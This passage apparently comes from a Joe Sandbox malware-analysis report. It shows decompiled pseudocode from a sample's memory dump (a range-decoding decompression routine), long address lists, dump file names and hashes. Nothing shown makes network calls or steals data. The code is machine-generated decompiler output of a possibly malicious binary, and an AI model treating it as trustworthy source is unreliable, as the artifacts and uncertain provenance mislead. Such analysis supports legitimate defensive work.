							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x00406a5f
0x00406a66
0x00406a6c
0x00406a72
0x00000000
0x00406a76
0x00406a82
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00000000
0x00406a98
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aad
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406af8
0x00406afb
0x00406b23
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406afd
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b15
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6c
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b71
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b8e
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd4
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727c
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b2
0x004072b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004072bb
0x004072bb
0x004072bf
0x0040746e
0x00000000
0x0040746e
0x004072cb
0x004072d2
0x004072da
0x004072da
0x004072da
0x004072dd
0x004072e0
0x004072e0
0x00000000
0x00000000
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x00000000
0x00406c8b
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6e
0x00000000
0x00406c6e
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00000000
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x00000000
0x00000000
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x00000000
0x00000000
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x00000000
0x00406fd6
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00406ef5
0x00406ef5
0x00406ef8
0x00000000
0x00000000
0x00407234
0x00407238
0x0040725a
0x0040725d
0x00407267
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x00000000
0x00407328
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e5
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00407366
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x004072e6
0x004072e6
0x00000000
0x004072e6
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738a
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073bc
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x0040722d
0x00407462
0x00407484
0x0040748a
0x0040748c
0x00407493
0x00000000
0x00000000
0x00406a91
0x00407499
0x00407499
0x00000000

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
Instruction ID: 0eb50412ba17cbd686f9e43e0b7d85c943a315db4d9133bb66c32ce13943f697
Opcode Fuzzy Hash: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
Instruction Fuzzy Hash: E7813471E04229DBDF24CFA9C8447ADBBB0FB44305F24816ED856BB281C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406E9D Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406E9D() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004074A1))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4)); // executed
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
